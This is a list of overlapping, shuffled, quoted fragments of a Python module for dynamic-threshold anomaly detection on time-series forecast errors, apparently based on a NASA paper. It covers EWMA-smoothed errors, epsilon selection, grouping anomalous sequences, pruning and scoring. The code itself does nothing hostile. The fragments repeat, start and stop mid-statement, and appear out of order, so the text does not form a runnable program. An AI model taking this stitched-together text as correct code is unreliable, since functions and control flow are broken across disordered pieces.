"mean mu = np.mean(window_smoothed_errors) smoothed_errors_inv = [mu + (mu - e) for e",
"y_hat (list): forecasted values. len(y_hat)==len(y_true). y_true (list): true values. len(y_hat)==len(y_true). window_size (int): batch_size",
") # get anomalies from inverse of smoothed errors # This was done",
"in the paper # we get the inverse by flipping around the mean",
"an anomaly continue for j in range(error_buffer): if (i + j) < len(smoothed_errors)",
"z in np.arange(2.5, sd_limit, 0.5): epsilon = mu + (sigma * z) below_epsilon,",
"/ mu sd_perc_decrease = (sigma - np.std(below_epsilon)) / sigma epsilon = (mean_perc_decrease +",
"all_anomalies: if i not in anomaly_indices: max_error_below_e = smoothed_errors[i] # group anomalies into",
"= smoothed_errors[i] # group anomalies into continuous sequences anomaly_indices = sorted(list(set(anomaly_indices))) groups =",
"accepted perc decrease btwn max errors in anomalous sequences MIN_PERCENT_DECREASE = 0.05 e_seq_max,",
"inspired by: https://arxiv.org/pdf/1802.04431.pdf def get_forecast_errors(y_hat, y_true, window_size=5, batch_size=30, smoothing_percent=0.05, smoothed=True): \"\"\" Calculates the",
"to process them for i in range(len(smoothed_errors)): adjusted_index = i + (window -",
"here we iterate in increments of 0.5 on the range that the NASA",
"\"\"\" if len(y_true) <= batch_size * window_size: raise ValueError(\"Window size (%s) larger than",
"MIN_PERCENT_DECREASE = 0.05 e_seq_max, smoothed_errors_max = [], [] for error_seq in e_seq: if",
"MIN_PERCENT_DECREASE: indices_remove.append(e_seq_max.index(smoothed_errors_max[i])) for index in sorted(indices_remove, reverse=True): del e_seq[index] pruned_indices = [] for",
") anomalies_indices = list(set(anomalies_indices + inv_anom_indices)) anomalies_indices.extend([i_a + i * batch_size for i_a",
"smoothed_errors_max = [], [] for error_seq in e_seq: if len(smoothed_errors[error_seq[0]:error_seq[1]]) > 0: sliced_errors",
"max_error_below_e def prune_anomalies(e_seq, smoothed_errors, max_error_below_e, anomaly_indices): \"\"\" Helper method that removes anomalies which",
"anomalies until model is trained enough anomaly_indices = [] max_error_below_e = 0 for",
"found to be good for z in np.arange(2.5, sd_limit, 0.5): epsilon = mu",
"range(0, error_buffer): if (i + j) not in above_epsilon and (i + j)",
"# generate sequences above_epsilon = sorted(list(set(above_epsilon))) groups = [list(group) for group in mit.consecutive_groups(above_epsilon)]",
"/ denominator for x in range(e_seq[0], e_seq[1]) ]) anomalies_scores.append(score) return anomaly_sequences, anomalies_scores def",
"errors_seq, smoothed_errors, max_error_below_e, anomaly_indices ) return anomaly_indices def group_consecutive_anomalies(smoothed_errors, epsilon, y_true, error_buffer, window,",
"sequences anomaly_indices = sorted(list(set(anomaly_indices))) groups = [list(group) for group in mit.consecutive_groups(anomaly_indices)] e_seq =",
"not in anomaly_indices: if (i + j) > minimum_index: anomaly_indices.append(i + j) if",
"anomalies to process them for i in range(len(smoothed_errors)): adjusted_index = i + (window",
"by user. \"\"\" errors = [abs(y_h - y_t) for y_h, y_t in zip(y_hat,",
"np.std(smoothed_errors) max_epsilon = 0 sd_threshold = sd_limit # The treshold is determined dynamically",
"is drawn from an ordered set of positive values representing the # number",
"window_size (int): batch_size (int): smoothing_percent (float): smoothed (bool): whether the returned errors should",
"+ sd_perc_decrease) /\\ (len(above_sequences)**2 + len(above_epsilon)) # update the largest epsilon we've seen",
"smoothing_percent (float): smoothed (bool): whether the returned errors should be smoothed with EWMA.",
"anomalies anomalies_indices = sorted(list(set(anomalies_indices))) anomalies_groups = [list(group) for group in mit.consecutive_groups(anomalies_indices)] anomaly_sequences =",
"(window - 1) * batch_size if smoothed_errors[i] > max_error_below_e and adjusted_index not in",
"window_size=5, batch_size=30, smoothing_percent=0.05, smoothed=True): \"\"\" Calculates the forecasting error for two arrays of",
"and (i + j) < len(smoothed_errors): above_epsilon.append(i + j) if (i - j)",
"(len(above_sequences)**2 + len(above_epsilon)) # update the largest epsilon we've seen so far if",
"anomalies_scores = [] for e_seq in anomaly_sequences: denominator = np.mean(smoothed_errors) + np.std(smoothed_errors) score",
"np.mean(smoothed_errors) + np.std(smoothed_errors) score = max([ abs(smoothed_errors[x] - epsilon) / denominator for x",
"epsilon: # above_epsilon values are anomalies for j in range(0, error_buffer): if (i",
"- j) < len(smoothed_errors) and (i - j) not in anomaly_indices: if (i",
"This was done in the implementation of NASA paper but # wasn't referenced",
"return max_epsilon, sd_threshold def get_anomalies(smoothed_errors, y_true, z, window, all_anomalies, error_buffer): \"\"\" Helper method",
"sorted(list(set(above_epsilon))) groups = [list(group) for group in mit.consecutive_groups(above_epsilon)] above_sequences = [(g[0], g[-1]) for",
"= delta / smoothed_errors_max[i] if perc_change < MIN_PERCENT_DECREASE: indices_remove.append(e_seq_max.index(smoothed_errors_max[i])) for index in sorted(indices_remove,",
"* batch_size * smoothing_percent) moving_avg = [] for i in range(len(errors)): left_window =",
"range that the NASA paper found to be good for z in np.arange(2.5,",
"errors in anomalous sequences MIN_PERCENT_DECREASE = 0.05 e_seq_max, smoothed_errors_max = [], [] for",
"should be smoothed with EWMA. Returns: (list): error residuals. Smoothed if specified by",
"all_anomalies ) if len(errors_seq) > 0: anomaly_indices = prune_anomalies( errors_seq, smoothed_errors, max_error_below_e, anomaly_indices",
"<= batch_size * window_size: raise ValueError(\"Window size (%s) larger than y_true (len=%s).\" %",
"we iterate in increments of 0.5 on the range that the NASA paper",
"prev_index = i * batch_size curr_index = (window_size * batch_size) + (i *",
"return anomaly_sequences, anomalies_scores def compute_threshold(smoothed_errors, error_buffer, sd_limit=12.0): \"\"\"Helper method for `extract_anomalies` method. Calculates",
"sd_threshold can be multiplied by sigma to get epsilon return max_epsilon, sd_threshold def",
"all the errors that are below epsilon and which # weren't identified as",
"curr_index = len(y_true) window_smoothed_errors = smoothed_errors[prev_index:curr_index] window_y_true = y_true[prev_index:curr_index] epsilon, sd_threshold = compute_threshold(window_smoothed_errors,",
"don't meet a minimum separation from next anomaly. \"\"\" # min accepted perc",
"reverse=True): del e_seq[index] pruned_indices = [] for i in anomaly_indices: for error_seq in",
"a cutoff value for anomalies until model is trained enough anomaly_indices = []",
"= 0 if right_window > len(errors): right_window = len(errors) moving_avg.append(np.mean(errors[left_window:right_window])) return moving_avg def",
"runs EWMA. Args: y_hat (list): forecasted values. len(y_hat)==len(y_true). y_true (list): true values. len(y_hat)==len(y_true).",
"max_epsilon = epsilon # sd_threshold can be multiplied by sigma to get epsilon",
"smoothed_errors[i] <= epsilon or smoothed_errors[i] <= 0.05 * accepted_range: # not an anomaly",
"= i + historical_error_window + 1 if left_window < 0: left_window = 0",
"batch_size (int): error_buffer (int): Returns: \"\"\" if len(y_true) <= batch_size * window_size: raise",
"- j) > minimum_index: anomaly_indices.append(i - j) # get all the errors that",
"btwn max errors in anomalous sequences MIN_PERCENT_DECREASE = 0.05 e_seq_max, smoothed_errors_max = [],",
"for z in np.arange(2.5, sd_limit, 0.5): epsilon = mu + (sigma * z)",
"list(set(anomalies_indices + inv_anom_indices)) anomalies_indices.extend([i_a + i * batch_size for i_a in window_anom_indices]) #",
"if (i + j) < len(smoothed_errors) and (i + j) not in anomaly_indices:",
"if not g[0] == g[-1]] mean_perc_decrease = (mu - np.mean(below_epsilon)) / mu sd_perc_decrease",
"/ batch_size) anomalies_indices = [] for i in range(num_windows + 1): prev_index =",
"all_anomalies, error_buffer): \"\"\" Helper method to get anomalies. \"\"\" mu = np.mean(smoothed_errors) sigma",
"= np.mean(window_smoothed_errors) smoothed_errors_inv = [mu + (mu - e) for e in window_smoothed_errors]",
"errors that are below epsilon and which # weren't identified as anomalies to",
"in range(len(smoothed_errors)): if smoothed_errors[i] <= epsilon or smoothed_errors[i] <= 0.05 * accepted_range: #",
"if len(smoothed_errors[error_seq[0]:error_seq[1]]) > 0: sliced_errors = smoothed_errors[error_seq[0]:error_seq[1]] e_seq_max.append(max(sliced_errors)) smoothed_errors_max.append(max(sliced_errors)) smoothed_errors_max.sort(reverse=True) if max_error_below_e >",
"[], [], [] for i in range(len(smoothed_errors)): e = smoothed_errors[i] if e <",
"!= g[-1]] return e_seq, anomaly_indices, max_error_below_e def prune_anomalies(e_seq, smoothed_errors, max_error_below_e, anomaly_indices): \"\"\" Helper",
"(list): forecasted values. len(y_hat)==len(y_true). y_true (list): true values. len(y_hat)==len(y_true). window_size (int): batch_size (int):",
"smoothed_errors_inv, window_y_true, sd_inv, i, anomalies_indices, len(y_true) ) anomalies_indices = list(set(anomalies_indices + inv_anom_indices)) anomalies_indices.extend([i_a",
"= [], [], [] for i in range(len(smoothed_errors)): e = smoothed_errors[i] if e",
"window, all_anomalies, batch_size=30): upper_percentile, lower_percentile = np.percentile(y_true, [95, 5]) accepted_range = upper_percentile -",
"the implementation of NASA paper but # wasn't referenced in the paper #",
"score = max([ abs(smoothed_errors[x] - epsilon) / denominator for x in range(e_seq[0], e_seq[1])",
"< len(smoothed_errors) and (i - j) not in anomaly_indices: if (i - j)",
"epsilon we've seen so far if epsilon > max_epsilon: sd_threshold = z max_epsilon",
"- j) if len(above_epsilon) == 0: continue # generate sequences above_epsilon = sorted(list(set(above_epsilon)))",
"if (i - j) > minimum_index: anomaly_indices.append(i - j) # get all the",
"ordered set of positive values representing the # number of standard deviations above",
"the NASA paper found to be good for z in np.arange(2.5, sd_limit, 0.5):",
"adjusted_index = i + (window - 1) * batch_size if smoothed_errors[i] > max_error_below_e",
"smoothed_errors_inv = [mu + (mu - e) for e in window_smoothed_errors] epsilon_inv, sd_inv",
"0.5 on the range that the NASA paper found to be good for",
"for g in groups if g[0] != g[-1]] return e_seq, anomaly_indices, max_error_below_e def",
"= [], [] for error_seq in e_seq: if len(smoothed_errors[error_seq[0]:error_seq[1]]) > 0: sliced_errors =",
"(mu - np.mean(below_epsilon)) / mu sd_perc_decrease = (sigma - np.std(below_epsilon)) / sigma epsilon",
"= np.percentile(y_true, [95, 5]) accepted_range = upper_percentile - lower_percentile minimum_index = 100 #",
"* accepted_range: # not an anomaly continue for j in range(error_buffer): if (i",
"anomalies_indices.extend([i_a + i * batch_size for i_a in window_anom_indices]) # group anomalies anomalies_indices",
"max errors in anomalous sequences MIN_PERCENT_DECREASE = 0.05 e_seq_max, smoothed_errors_max = [], []",
"if left_window < 0: left_window = 0 if right_window > len(errors): right_window =",
"multiple Zs. # z is drawn from an ordered set of positive values",
"- e) for e in window_smoothed_errors] epsilon_inv, sd_inv = compute_threshold(smoothed_errors_inv, error_buffer) inv_anom_indices =",
"have a cutoff value for anomalies until model is trained enough anomaly_indices =",
"z max_epsilon = epsilon # sd_threshold can be multiplied by sigma to get",
"for i in range(num_windows + 1): prev_index = i * batch_size curr_index =",
"groups = [list(group) for group in mit.consecutive_groups(above_epsilon)] above_sequences = [(g[0], g[-1]) for g",
"# Implementation inspired by: https://arxiv.org/pdf/1802.04431.pdf def get_forecast_errors(y_hat, y_true, window_size=5, batch_size=30, smoothing_percent=0.05, smoothed=True): \"\"\"",
"if (i - j) not in above_epsilon and (i - j) >= 0:",
"max_epsilon = 0 sd_threshold = sd_limit # The treshold is determined dynamically by",
"i_a in window_anom_indices]) # group anomalies anomalies_indices = sorted(list(set(anomalies_indices))) anomalies_groups = [list(group) for",
"the returned errors should be smoothed with EWMA. Returns: (list): error residuals. Smoothed",
"window_anom_indices]) # group anomalies anomalies_indices = sorted(list(set(anomalies_indices))) anomalies_groups = [list(group) for group in",
"accepted_range = upper_percentile - lower_percentile minimum_index = 100 # have a cutoff value",
"in range(len(smoothed_errors)): e = smoothed_errors[i] if e < epsilon: # save to compute",
"in groups if g[0] != g[-1]] return e_seq, anomaly_indices, max_error_below_e def prune_anomalies(e_seq, smoothed_errors,",
"i - historical_error_window right_window = i + historical_error_window + 1 if left_window <",
"i in range(num_windows + 1): prev_index = i * batch_size curr_index = (window_size",
"if i == num_windows + 1: curr_index = len(y_true) window_smoothed_errors = smoothed_errors[prev_index:curr_index] window_y_true",
"del e_seq[index] pruned_indices = [] for i in anomaly_indices: for error_seq in e_seq:",
"error_seq in e_seq: if i >= error_seq[0] and i <= error_seq[1]: pruned_indices.append(i) return",
"i * batch_size for i_a in window_anom_indices]) # group anomalies anomalies_indices = sorted(list(set(anomalies_indices)))",
"e_seq_max, smoothed_errors_max = [], [] for error_seq in e_seq: if len(smoothed_errors[error_seq[0]:error_seq[1]]) > 0:",
"y_true)] if not smoothed: return errors historical_error_window = int(window_size * batch_size * smoothing_percent)",
"window_y_true, sd_inv, i, anomalies_indices, len(y_true) ) anomalies_indices = list(set(anomalies_indices + inv_anom_indices)) anomalies_indices.extend([i_a +",
"for anomalies based on the max distance from epsilon for each sequence anomalies_scores",
"errors. Args: y_true (): smoothed_errors (): window_size (int): batch_size (int): error_buffer (int): Returns:",
"above mean(smoothed_errors) # here we iterate in increments of 0.5 on the range",
"window, all_anomalies, error_buffer): \"\"\" Helper method to get anomalies. \"\"\" mu = np.mean(smoothed_errors)",
"i in range(len(errors)): left_window = i - historical_error_window right_window = i + historical_error_window",
"adjusted_index not in all_anomalies: if i not in anomaly_indices: max_error_below_e = smoothed_errors[i] #",
"smoothing_percent=0.05, smoothed=True): \"\"\" Calculates the forecasting error for two arrays of data. If",
"sd_inv, i, anomalies_indices, len(y_true) ) anomalies_indices = list(set(anomalies_indices + inv_anom_indices)) anomalies_indices.extend([i_a + i",
"# weren't identified as anomalies to process them for i in range(len(smoothed_errors)): adjusted_index",
"if max_error_below_e > 0: smoothed_errors_max.append(max_error_below_e) indices_remove = [] for i in range(len(smoothed_errors_max)): if",
"treshold is determined dynamically by testing multiple Zs. # z is drawn from",
"get anomalies. \"\"\" mu = np.mean(smoothed_errors) sigma = np.std(smoothed_errors) epsilon = mu +",
"be smoothed with EWMA. Returns: (list): error residuals. Smoothed if specified by user.",
"implementation of NASA paper but # wasn't referenced in the paper # we",
"int(window_size * batch_size * smoothing_percent) moving_avg = [] for i in range(len(errors)): left_window",
"0.05 e_seq_max, smoothed_errors_max = [], [] for error_seq in e_seq: if len(smoothed_errors[error_seq[0]:error_seq[1]]) >",
"+ j) > minimum_index: anomaly_indices.append(i + j) if (i - j) < len(smoothed_errors)",
"error_buffer): if (i + j) not in above_epsilon and (i + j) <",
"anomaly_indices): \"\"\" Helper method that removes anomalies which don't meet a minimum separation",
"if g[0] != g[-1]] return e_seq, anomaly_indices, max_error_below_e def prune_anomalies(e_seq, smoothed_errors, max_error_below_e, anomaly_indices):",
"by sigma to get epsilon return max_epsilon, sd_threshold def get_anomalies(smoothed_errors, y_true, z, window,",
"batch_size curr_index = (window_size * batch_size) + (i * batch_size) if i ==",
"* batch_size if smoothed_errors[i] > max_error_below_e and adjusted_index not in all_anomalies: if i",
"(int): error_buffer (int): Returns: \"\"\" if len(y_true) <= batch_size * window_size: raise ValueError(\"Window",
"j) not in above_epsilon and (i + j) < len(smoothed_errors): above_epsilon.append(i + j)",
"len(smoothed_errors) and (i - j) not in anomaly_indices: if (i - j) >",
"sd_limit # The treshold is determined dynamically by testing multiple Zs. # z",
"as mit import numpy as np # Methods to do dynamic error thresholding",
"batch_size for i_a in window_anom_indices]) # group anomalies anomalies_indices = sorted(list(set(anomalies_indices))) anomalies_groups =",
"> max_epsilon: sd_threshold = z max_epsilon = epsilon # sd_threshold can be multiplied",
"value for anomalies until model is trained enough anomaly_indices = [] max_error_below_e =",
"window_size, batch_size, error_buffer): \"\"\" Extracts anomalies from the errors. Args: y_true (): smoothed_errors",
"# wasn't referenced in the paper # we get the inverse by flipping",
"range(len(errors)): left_window = i - historical_error_window right_window = i + historical_error_window + 1",
"(batch_size * window_size)) / batch_size) anomalies_indices = [] for i in range(num_windows +",
"below_indices, above_epsilon = [], [], [] for i in range(len(smoothed_errors)): e = smoothed_errors[i]",
"g[-1]) for g in anomalies_groups if not g[0] == g[-1]] # generate \"scores\"",
"min accepted perc decrease btwn max errors in anomalous sequences MIN_PERCENT_DECREASE = 0.05",
"anomalies_indices = sorted(list(set(anomalies_indices))) anomalies_groups = [list(group) for group in mit.consecutive_groups(anomalies_indices)] anomaly_sequences = [(g[0],",
"anomalies_groups if not g[0] == g[-1]] # generate \"scores\" for anomalies based on",
"for y_h, y_t in zip(y_hat, y_true)] if not smoothed: return errors historical_error_window =",
"smoothed with EWMA. Returns: (list): error residuals. Smoothed if specified by user. \"\"\"",
"1): prev_index = i * batch_size curr_index = (window_size * batch_size) + (i",
"epsilon = mu + (sigma * z) below_epsilon, below_indices, above_epsilon = [], [],",
"epsilon (threshold) for anomalies. \"\"\" mu = np.mean(smoothed_errors) sigma = np.std(smoothed_errors) max_epsilon =",
"get epsilon return max_epsilon, sd_threshold def get_anomalies(smoothed_errors, y_true, z, window, all_anomalies, error_buffer): \"\"\"",
"= [list(group) for group in mit.consecutive_groups(anomaly_indices)] e_seq = [(g[0], g[-1]) for g in",
"for i in range(len(smoothed_errors_max)): if i < len(smoothed_errors_max) - 1: delta = smoothed_errors_max[i]",
"g in anomalies_groups if not g[0] == g[-1]] # generate \"scores\" for anomalies",
"j) < len(smoothed_errors): above_epsilon.append(i + j) if (i - j) not in above_epsilon",
"g[-1]] return e_seq, anomaly_indices, max_error_below_e def prune_anomalies(e_seq, smoothed_errors, max_error_below_e, anomaly_indices): \"\"\" Helper method",
"if (i - j) < len(smoothed_errors) and (i - j) not in anomaly_indices:",
"+ (window - 1) * batch_size if smoothed_errors[i] > max_error_below_e and adjusted_index not",
"(mu - e) for e in window_smoothed_errors] epsilon_inv, sd_inv = compute_threshold(smoothed_errors_inv, error_buffer) inv_anom_indices",
"`extract_anomalies` method. Calculates the epsilon (threshold) for anomalies. \"\"\" mu = np.mean(smoothed_errors) sigma",
"be good for z in np.arange(2.5, sd_limit, 0.5): epsilon = mu + (sigma",
"errors_seq, anomaly_indices, max_error_below_e = group_consecutive_anomalies( smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies ) if",
"g[0] == g[-1]] # generate \"scores\" for anomalies based on the max distance",
"= y_true[prev_index:curr_index] epsilon, sd_threshold = compute_threshold(window_smoothed_errors, error_buffer) window_anom_indices = get_anomalies( window_smoothed_errors, window_y_true, sd_threshold,",
"len(y_true) ) anomalies_indices = list(set(anomalies_indices + inv_anom_indices)) anomalies_indices.extend([i_a + i * batch_size for",
"if len(y_true) <= batch_size * window_size: raise ValueError(\"Window size (%s) larger than y_true",
"(sigma - np.std(below_epsilon)) / sigma epsilon = (mean_perc_decrease + sd_perc_decrease) /\\ (len(above_sequences)**2 +",
"perc_change < MIN_PERCENT_DECREASE: indices_remove.append(e_seq_max.index(smoothed_errors_max[i])) for index in sorted(indices_remove, reverse=True): del e_seq[index] pruned_indices =",
"distance from epsilon for each sequence anomalies_scores = [] for e_seq in anomaly_sequences:",
"+ j) if (i - j) < len(smoothed_errors) and (i - j) not",
"left_window < 0: left_window = 0 if right_window > len(errors): right_window = len(errors)",
"inverse by flipping around the mean mu = np.mean(window_smoothed_errors) smoothed_errors_inv = [mu +",
"= smoothed_errors[error_seq[0]:error_seq[1]] e_seq_max.append(max(sliced_errors)) smoothed_errors_max.append(max(sliced_errors)) smoothed_errors_max.sort(reverse=True) if max_error_below_e > 0: smoothed_errors_max.append(max_error_below_e) indices_remove = []",
"Returns: \"\"\" if len(y_true) <= batch_size * window_size: raise ValueError(\"Window size (%s) larger",
"get_forecast_errors(y_hat, y_true, window_size=5, batch_size=30, smoothing_percent=0.05, smoothed=True): \"\"\" Calculates the forecasting error for two",
"sd_threshold = sd_limit # The treshold is determined dynamically by testing multiple Zs.",
"can be multiplied by sigma to get epsilon return max_epsilon, sd_threshold def get_anomalies(smoothed_errors,",
"= 0 sd_threshold = sd_limit # The treshold is determined dynamically by testing",
"continue # generate sequences above_epsilon = sorted(list(set(above_epsilon))) groups = [list(group) for group in",
"j) < len(smoothed_errors) and (i - j) not in anomaly_indices: if (i -",
"\"\"\" # min accepted perc decrease btwn max errors in anomalous sequences MIN_PERCENT_DECREASE",
"anomalies_groups = [list(group) for group in mit.consecutive_groups(anomalies_indices)] anomaly_sequences = [(g[0], g[-1]) for g",
"batch_size, error_buffer): \"\"\" Extracts anomalies from the errors. Args: y_true (): smoothed_errors ():",
"\"\"\" mu = np.mean(smoothed_errors) sigma = np.std(smoothed_errors) max_epsilon = 0 sd_threshold = sd_limit",
"(i + j) not in above_epsilon and (i + j) < len(smoothed_errors): above_epsilon.append(i",
"- j) # get all the errors that are below epsilon and which",
"+ j) not in anomaly_indices: if (i + j) > minimum_index: anomaly_indices.append(i +",
"error thresholding on timeseries data # Implementation inspired by: https://arxiv.org/pdf/1802.04431.pdf def get_forecast_errors(y_hat, y_true,",
"(batch_size, len(y_true))) num_windows = int((len(y_true) - (batch_size * window_size)) / batch_size) anomalies_indices =",
"= smoothed_errors[prev_index:curr_index] window_y_true = y_true[prev_index:curr_index] epsilon, sd_threshold = compute_threshold(window_smoothed_errors, error_buffer) window_anom_indices = get_anomalies(",
"that are below epsilon and which # weren't identified as anomalies to process",
"representing the # number of standard deviations above mean(smoothed_errors) # here we iterate",
"= np.std(smoothed_errors) max_epsilon = 0 sd_threshold = sd_limit # The treshold is determined",
"far if epsilon > max_epsilon: sd_threshold = z max_epsilon = epsilon # sd_threshold",
"# not an anomaly continue for j in range(error_buffer): if (i + j)",
"in anomalous sequences MIN_PERCENT_DECREASE = 0.05 e_seq_max, smoothed_errors_max = [], [] for error_seq",
"anomalies_indices = [] for i in range(num_windows + 1): prev_index = i *",
"= [list(group) for group in mit.consecutive_groups(above_epsilon)] above_sequences = [(g[0], g[-1]) for g in",
"j) if len(above_epsilon) == 0: continue # generate sequences above_epsilon = sorted(list(set(above_epsilon))) groups",
"if smoothed_errors[i] <= epsilon or smoothed_errors[i] <= 0.05 * accepted_range: # not an",
"The treshold is determined dynamically by testing multiple Zs. # z is drawn",
"smoothed_errors_max[i] if perc_change < MIN_PERCENT_DECREASE: indices_remove.append(e_seq_max.index(smoothed_errors_max[i])) for index in sorted(indices_remove, reverse=True): del e_seq[index]",
"cutoff value for anomalies until model is trained enough anomaly_indices = [] max_error_below_e",
"if len(errors_seq) > 0: anomaly_indices = prune_anomalies( errors_seq, smoothed_errors, max_error_below_e, anomaly_indices ) return",
"epsilon, sd_threshold = compute_threshold(window_smoothed_errors, error_buffer) window_anom_indices = get_anomalies( window_smoothed_errors, window_y_true, sd_threshold, i, anomalies_indices,",
"right_window = len(errors) moving_avg.append(np.mean(errors[left_window:right_window])) return moving_avg def extract_anomalies(y_true, smoothed_errors, window_size, batch_size, error_buffer): \"\"\"",
"batch_size=30, smoothing_percent=0.05, smoothed=True): \"\"\" Calculates the forecasting error for two arrays of data.",
"smoothed: return errors historical_error_window = int(window_size * batch_size * smoothing_percent) moving_avg = []",
"moving_avg def extract_anomalies(y_true, smoothed_errors, window_size, batch_size, error_buffer): \"\"\" Extracts anomalies from the errors.",
"len(y_true))) num_windows = int((len(y_true) - (batch_size * window_size)) / batch_size) anomalies_indices = []",
"+ 1 if left_window < 0: left_window = 0 if right_window > len(errors):",
"error_buffer (int): Returns: \"\"\" if len(y_true) <= batch_size * window_size: raise ValueError(\"Window size",
"0.05 * accepted_range: # not an anomaly continue for j in range(error_buffer): if",
"len(y_true) <= batch_size * window_size: raise ValueError(\"Window size (%s) larger than y_true (len=%s).\"",
"i + historical_error_window + 1 if left_window < 0: left_window = 0 if",
"anomalies into continuous sequences anomaly_indices = sorted(list(set(anomaly_indices))) groups = [list(group) for group in",
"timeseries data # Implementation inspired by: https://arxiv.org/pdf/1802.04431.pdf def get_forecast_errors(y_hat, y_true, window_size=5, batch_size=30, smoothing_percent=0.05,",
"= (mu - np.mean(below_epsilon)) / mu sd_perc_decrease = (sigma - np.std(below_epsilon)) / sigma",
"seen so far if epsilon > max_epsilon: sd_threshold = z max_epsilon = epsilon",
"left_window = 0 if right_window > len(errors): right_window = len(errors) moving_avg.append(np.mean(errors[left_window:right_window])) return moving_avg",
"so far if epsilon > max_epsilon: sd_threshold = z max_epsilon = epsilon #",
"anomaly_indices def group_consecutive_anomalies(smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies, batch_size=30): upper_percentile, lower_percentile = np.percentile(y_true,",
"sigma = np.std(smoothed_errors) max_epsilon = 0 sd_threshold = sd_limit # The treshold is",
"- smoothed_errors_max[i + 1] perc_change = delta / smoothed_errors_max[i] if perc_change < MIN_PERCENT_DECREASE:",
"smoothed_errors[prev_index:curr_index] window_y_true = y_true[prev_index:curr_index] epsilon, sd_threshold = compute_threshold(window_smoothed_errors, error_buffer) window_anom_indices = get_anomalies( window_smoothed_errors,",
"below epsilon and which # weren't identified as anomalies to process them for",
"process them for i in range(len(smoothed_errors)): adjusted_index = i + (window - 1)",
"y_true, error_buffer, window, all_anomalies, batch_size=30): upper_percentile, lower_percentile = np.percentile(y_true, [95, 5]) accepted_range =",
"< epsilon: # save to compute delta mean and delta std # these",
"smoothed_errors_max.sort(reverse=True) if max_error_below_e > 0: smoothed_errors_max.append(max_error_below_e) indices_remove = [] for i in range(len(smoothed_errors_max)):",
"= get_anomalies( smoothed_errors_inv, window_y_true, sd_inv, i, anomalies_indices, len(y_true) ) anomalies_indices = list(set(anomalies_indices +",
"in anomalies_groups if not g[0] == g[-1]] # generate \"scores\" for anomalies based",
"the errors that are below epsilon and which # weren't identified as anomalies",
"in range(num_windows + 1): prev_index = i * batch_size curr_index = (window_size *",
"= epsilon # sd_threshold can be multiplied by sigma to get epsilon return",
"in above_epsilon and (i - j) >= 0: above_epsilon.append(i - j) if len(above_epsilon)",
"[list(group) for group in mit.consecutive_groups(anomalies_indices)] anomaly_sequences = [(g[0], g[-1]) for g in anomalies_groups",
"- j) not in anomaly_indices: if (i - j) > minimum_index: anomaly_indices.append(i -",
"= i + (window - 1) * batch_size if smoothed_errors[i] > max_error_below_e and",
"anomalous sequences MIN_PERCENT_DECREASE = 0.05 e_seq_max, smoothed_errors_max = [], [] for error_seq in",
"batch_size * window_size: raise ValueError(\"Window size (%s) larger than y_true (len=%s).\" % (batch_size,",
"get_anomalies( window_smoothed_errors, window_y_true, sd_threshold, i, anomalies_indices, error_buffer ) # get anomalies from inverse",
"group anomalies into continuous sequences anomaly_indices = sorted(list(set(anomaly_indices))) groups = [list(group) for group",
"> len(errors): right_window = len(errors) moving_avg.append(np.mean(errors[left_window:right_window])) return moving_avg def extract_anomalies(y_true, smoothed_errors, window_size, batch_size,",
"values are anomalies for j in range(0, error_buffer): if (i + j) not",
"np.mean(below_epsilon)) / mu sd_perc_decrease = (sigma - np.std(below_epsilon)) / sigma epsilon = (mean_perc_decrease",
"of NASA paper but # wasn't referenced in the paper # we get",
"batch_size if smoothed_errors[i] > max_error_below_e and adjusted_index not in all_anomalies: if i not",
"the largest epsilon we've seen so far if epsilon > max_epsilon: sd_threshold =",
"len(y_true) window_smoothed_errors = smoothed_errors[prev_index:curr_index] window_y_true = y_true[prev_index:curr_index] epsilon, sd_threshold = compute_threshold(window_smoothed_errors, error_buffer) window_anom_indices",
"e_seq_max.append(max(sliced_errors)) smoothed_errors_max.append(max(sliced_errors)) smoothed_errors_max.sort(reverse=True) if max_error_below_e > 0: smoothed_errors_max.append(max_error_below_e) indices_remove = [] for i",
"and (i + j) not in anomaly_indices: if (i + j) > minimum_index:",
"accepted_range: # not an anomaly continue for j in range(error_buffer): if (i +",
"groups = [list(group) for group in mit.consecutive_groups(anomaly_indices)] e_seq = [(g[0], g[-1]) for g",
"EWMA. Returns: (list): error residuals. Smoothed if specified by user. \"\"\" errors =",
"= [] max_error_below_e = 0 for i in range(len(smoothed_errors)): if smoothed_errors[i] <= epsilon",
"[(g[0], g[-1]) for g in groups if g[0] != g[-1]] return e_seq, anomaly_indices,",
"\"\"\" mu = np.mean(smoothed_errors) sigma = np.std(smoothed_errors) epsilon = mu + (z *",
"compute_threshold(smoothed_errors, error_buffer, sd_limit=12.0): \"\"\"Helper method for `extract_anomalies` method. Calculates the epsilon (threshold) for",
"- j) >= 0: above_epsilon.append(i - j) if len(above_epsilon) == 0: continue #",
"anomalies_scores.append(score) return anomaly_sequences, anomalies_scores def compute_threshold(smoothed_errors, error_buffer, sd_limit=12.0): \"\"\"Helper method for `extract_anomalies` method.",
"compute_threshold(window_smoothed_errors, error_buffer) window_anom_indices = get_anomalies( window_smoothed_errors, window_y_true, sd_threshold, i, anomalies_indices, error_buffer ) #",
"max_epsilon, sd_threshold def get_anomalies(smoothed_errors, y_true, z, window, all_anomalies, error_buffer): \"\"\" Helper method to",
"are important for epsilon calculation below_epsilon.append(e) below_indices.append(i) if e > epsilon: # above_epsilon",
"range(num_windows + 1): prev_index = i * batch_size curr_index = (window_size * batch_size)",
"returned errors should be smoothed with EWMA. Returns: (list): error residuals. Smoothed if",
"i not in anomaly_indices: max_error_below_e = smoothed_errors[i] # group anomalies into continuous sequences",
"- 1) * batch_size if smoothed_errors[i] > max_error_below_e and adjusted_index not in all_anomalies:",
"= smoothed_errors[i] if e < epsilon: # save to compute delta mean and",
"e_seq = [(g[0], g[-1]) for g in groups if g[0] != g[-1]] return",
"# save to compute delta mean and delta std # these are important",
"epsilon and which # weren't identified as anomalies to process them for i",
"= [] for i in range(num_windows + 1): prev_index = i * batch_size",
"in np.arange(2.5, sd_limit, 0.5): epsilon = mu + (sigma * z) below_epsilon, below_indices,",
"= np.mean(smoothed_errors) sigma = np.std(smoothed_errors) epsilon = mu + (z * sigma) #",
"[] for error_seq in e_seq: if len(smoothed_errors[error_seq[0]:error_seq[1]]) > 0: sliced_errors = smoothed_errors[error_seq[0]:error_seq[1]] e_seq_max.append(max(sliced_errors))",
"smoothed errors # This was done in the implementation of NASA paper but",
"the max distance from epsilon for each sequence anomalies_scores = [] for e_seq",
"in anomaly_indices: if (i - j) > minimum_index: anomaly_indices.append(i - j) # get",
